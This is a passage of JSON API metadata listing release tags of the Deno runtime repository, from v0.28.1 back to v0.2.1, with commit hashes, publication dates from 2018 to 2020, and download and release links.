0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-0